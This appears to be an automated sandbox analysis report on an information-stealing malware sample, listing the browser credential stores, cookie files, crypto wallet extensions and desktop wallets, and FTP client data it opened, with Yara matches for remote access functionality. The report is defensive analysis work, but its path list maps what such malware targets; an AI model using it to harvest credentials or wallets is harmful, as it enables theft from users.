Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lpfcbjknijpeeillifnkikgncikgfhdo Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ffnbelfdoeiohenkjibnmadjiehjhajb Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fijngjgcjhjmmpcmkeiomlglpeiijkld Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lkcjlnjfpbikmcmbachjpdbijejflpcm Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\formhistory.sqlite Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nhnkbkgjikgcigadomkphalanndcapjk Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\egjidjbpglichdcondbcbdnbeeppgdph Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhmfendgdocmcbmfikdcogofphimnkno Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneec Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data For Account Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cjelfplplebdjjenllpjcblmjkfcffne Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\imloifkgjagghnncjkhggdhalmcnfklk Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jnlgamecbpmbajjfhmmmlhejkemejdma Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For Account Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\afbcbjpbpfadlkmhmclhkeeodmamcflc Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fcfcfllfndlomdhbehjjcoimbgofdncg Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\places.sqlite Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jgaaimajipbpdogpdglhaphldakikgef Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nknhiehlklippafakaeklbeglecifhad Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\opcgpfmipidbgpenhmajoajpbobppdil Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mcohilncbfahbmgdjkbpemcciiolgcge Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkddgncdjgjfcddamfgcmfnlhccnimig Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnncmdhjacpkmjmkcafchppbnpnhdmon Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jbdaocneiiinmjbjlgalhcelgbejmnid Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\amkmjjmmflddogmhpjloimipbofnfjih Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aflkmfhebedbjioipglgcbcmnbpgliof Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\heefohaffomkkkphnlpohglngmbcclhi Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bcopgchhojmggmffilplmbdicgaihlkp Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\phkbamefinggmakgklpkljjmgibohnba Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hifafgmccdpekplomjjkcfgodnhcellj Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\loinekcabhlmhjjbocijdoimmejangoa Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdm Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\key4.db Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\idnnbdplmphpflfnlkomgpfbpcgelopg Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onhogfjeacnfoofkfgppdlbmlmnplgbn Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ijmpgkjfkbfhoebgogflfebnmejmfbm Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\gaedmjdfmmahhbjefcbgaolhhanlaolb Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lgmpcpglpngdoalbgeoldeajfclnhafa Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lodccjjbdhfakaekdiahmedfbieldgik Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\FTPInfo Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Conceptworld\Notezilla Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\FTPbox Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\Favorites Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\FTPRush Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\FTPGetter Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\ProgramData\SiteDesigner\3D-FTP Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Ledger Live Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Binance Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Electrum\wallets Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB Jump to behavior
Source: d7c50276ff.exe Binary or memory string: WIN_81
Source: d7c50276ff.exe Binary or memory string: WIN_XP
Source: d7c50276ff.exe, 0000000C.00000000.2619556994.0000000001022000.00000002.00000001.01000000.00000011.sdmp Binary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_11WIN_10WIN_2022WIN_2019WIN_2016WIN_81WIN_2012R2WIN_2012WIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPInstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\AppearanceUSERPROFILEUSERDOMAINUSERDNSDOMAINGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubyte64HKEY_LOCAL_MACHINEHKLMHKEY_CLASSES_ROOTHKCRHKEY_CURRENT_CONFIGHKCCHKEY_CURRENT_USERHKCUHKEY_USERSHKUREG_EXPAND_SZREG_SZREG_MULTI_SZREG_DWORDREG_QWORDREG_BINARYRegDeleteKeyExWadvapi32.dll+.-.\\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs](*UCP)\XISVISIBLEISENABLEDTABLEFTTABRIGHTCURRENTTABSHOWDROPDOWNHIDEDROPDOWNADDSTRINGDELSTRINGFINDSTRINGGETCOUNTSETCURRENTSELECTIONGETCURRENTSELECTIONSELECTSTRINGISCHECKEDCHECKUNCHECKGETSELECTEDGETLINECOUNTGETCURRENTLINEGETCURRENTCOLEDITPASTEGETLINESENDCOMMANDIDGETITEMCOUNTGETSUBITEMCOUNTGETTEXTGETSELECTEDCOUNTISSELECTEDSELECTALLSELECTCLEARSELECTINVERTDESELECTFINDITEMVIEWCHANGEGETTOTALCOUNTCOLLAPSEEXPANDmsctls_statusbar321tooltips_class32%d/%02d/%02dbuttonComboboxListboxSysDateTimePick32SysMonthCal32.icl.exe.dllMsctls_Progress32msctls_trackbar32SysAnimate32msctls_updown32SysTabControl32SysTreeView32SysListView32-----@GUI_DRAGID@GUI_DROPID@GUI_DRAGFILEError text not found (please report)Q\EDEFINEUTF16)UTF)UCP)NO_AUTO_POSSESS)NO_START_OPT)LIMIT_MATCH=LIMIT_RECURSION=CR)LF)CRLF)ANY)ANYCRLF)BSR_ANYCRLF)BSR_UNICODE)argument is not a compiled regular expressionargument not compiled in 16 bit modeinternal error: opcode not recognizedinternal error: missing capturing bracketfailed to get memory
Source: d7c50276ff.exe Binary or memory string: WIN_XPe
Source: d7c50276ff.exe Binary or memory string: WIN_VISTA
Source: d7c50276ff.exe Binary or memory string: WIN_7
Source: d7c50276ff.exe Binary or memory string: WIN_8
Source: C:\Users\user\Desktop\file.exe Directory queried: C:\Users\user\Documents Jump to behavior
Source: C:\Users\user\Desktop\file.exe Directory queried: C:\Users\user\Documents Jump to behavior
Source: C:\Users\user\Desktop\file.exe Directory queried: C:\Users\user\Documents Jump to behavior
Source: C:\Users\user\Desktop\file.exe Directory queried: C:\Users\user\Documents\GRXZDKKVDB Jump to behavior
Source: C:\Users\user\Desktop\file.exe Directory queried: C:\Users\user\Documents\IPKGELNTQY Jump to behavior
Source: C:\Users\user\Desktop\file.exe Directory queried: C:\Users\user\Documents\IPKGELNTQY Jump to behavior
Source: C:\Users\user\Desktop\file.exe Directory queried: C:\Users\user\Documents\NEBFQQYWPS Jump to behavior
Source: C:\Users\user\Desktop\file.exe Directory queried: C:\Users\user\Documents\NVWZAPQSQL Jump to behavior
Source: C:\Users\user\Desktop\file.exe Directory queried: C:\Users\user\Documents\PWCCAWLGRE Jump to behavior
Source: C:\Users\user\Desktop\file.exe Directory queried: C:\Users\user\Documents\QCFWYSKMHA Jump to behavior
Source: C:\Users\user\Desktop\file.exe Directory queried: C:\Users\user\Documents Jump to behavior
Source: C:\Users\user\Desktop\file.exe Directory queried: C:\Users\user\Documents\GRXZDKKVDB Jump to behavior
Source: C:\Users\user\Desktop\file.exe Directory queried: C:\Users\user\Documents\GRXZDKKVDB Jump to behavior
Source: C:\Users\user\Desktop\file.exe Directory queried: C:\Users\user\Documents\IPKGELNTQY Jump to behavior
Source: C:\Users\user\Desktop\file.exe Directory queried: C:\Users\user\Documents\NEBFQQYWPS Jump to behavior
Source: C:\Users\user\Desktop\file.exe Directory queried: C:\Users\user\Documents\NVWZAPQSQL Jump to behavior
Source: C:\Users\user\Desktop\file.exe Directory queried: C:\Users\user\Documents\PWCCAWLGRE Jump to behavior
Source: C:\Users\user\Desktop\file.exe Directory queried: C:\Users\user\Documents\QCFWYSKMHA Jump to behavior
Source: C:\Users\user\Desktop\file.exe Directory queried: C:\Users\user\Documents Jump to behavior
Source: C:\Users\user\Desktop\file.exe Directory queried: C:\Users\user\Documents\NEBFQQYWPS Jump to behavior
Source: C:\Users\user\Desktop\file.exe Directory queried: C:\Users\user\Documents\QCFWYSKMHA Jump to behavior
Source: C:\Users\user\Desktop\file.exe Directory queried: C:\Users\user\Documents Jump to behavior
Source: C:\Users\user\Desktop\file.exe Directory queried: C:\Users\user\Documents\NEBFQQYWPS Jump to behavior
Source: C:\Users\user\Desktop\file.exe Directory queried: C:\Users\user\Documents Jump to behavior
Source: C:\Users\user\Desktop\file.exe Directory queried: C:\Users\user\Documents\NVWZAPQSQL Jump to behavior
Source: C:\Users\user\Desktop\file.exe Directory queried: C:\Users\user\Documents Jump to behavior
Source: C:\Users\user\Desktop\file.exe Directory queried: C:\Users\user\Documents Jump to behavior
Source: C:\Users\user\Desktop\file.exe Directory queried: C:\Users\user\Documents\IPKGELNTQY Jump to behavior
Source: C:\Users\user\Desktop\file.exe Directory queried: C:\Users\user\Documents\NEBFQQYWPS Jump to behavior
Source: C:\Users\user\Desktop\file.exe Directory queried: C:\Users\user\Documents\QCFWYSKMHA Jump to behavior

Remote Access Functionality

barindex
Source: Yara match File source: 00000021.00000003.2991405310.00000000010EF000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: d7c50276ff.exe PID: 6488, type: MEMORYSTR
Source: Yara match File source: sslproxydump.pcap, type: PCAP
Source: Yara match File source: 27.2.num.exe.9e0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 32.2.7d61336cf8.exe.a20000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 36.0.num.exe.9e0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 36.2.num.exe.9e0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 27.0.num.exe.9e0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.7d61336cf8.exe.a20000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 4.2.ENORVNMU067PBMHUGECCERYC06W3ZY.exe.4d0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 0000001B.00000000.2667130005.00000000009E1000.00000080.00000001.01000000.00000013.sdmp, type: MEMORY
Source: Yara match File source: 00000020.00000003.2760497126.0000000004D40000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000024.00000002.2926562320.0000000001187000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000024.00000000.2909397637.00000000009E1000.00000080.00000001.01000000.00000013.sdmp, type: MEMORY
Source: Yara match File source: 0000001B.00000002.2687324655.00000000009E1000.00000080.00000001.01000000.00000013.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000003.2591227334.00000000053C0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000024.00000002.2924335248.00000000009E1000.00000080.00000001.01000000.00000013.sdmp, type: MEMORY
Source: Yara match File source: 0000001B.00000002.2688771618.0000000000EBE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000002.2493072660.0000000000F6E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000003.2404591407.0000000004E90000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.2635976470.000000000173E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000020.00000002.2807278591.0000000000A21000.00000040.00000001.01000000.00000010.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.2634884064.0000000000A21000.00000040.00000001.01000000.00000010.sdmp, type: MEMORY
Source: Yara match File source: 00000020.00000002.2806511011.000000000082B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000002.2492114993.00000000004D1000.00000040.00000001.01000000.00000009.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: ENORVNMU067PBMHUGECCERYC06W3ZY.exe PID: 5636, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: 7d61336cf8.exe PID: 1468, type: MEMORYSTR
Source: Yara match File source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\num[1].exe, type: DROPPED
Source: Yara match File source: C:\Users\user\AppData\Local\Temp\1000995001\num.exe, type: DROPPED
Source: Yara match File source: dump.pcap, type: PCAP
Source: C:\Users\user\AppData\Local\Temp\1000994001\d7c50276ff.exe Code function: 12_2_00FE1204 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,listen,WSAGetLastError,closesocket, 12_2_00FE1204
Source: C:\Users\user\AppData\Local\Temp\1000994001\d7c50276ff.exe Code function: 12_2_00FE1806 socket,WSAGetLastError,bind,WSAGetLastError,closesocket, 12_2_00FE1806
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs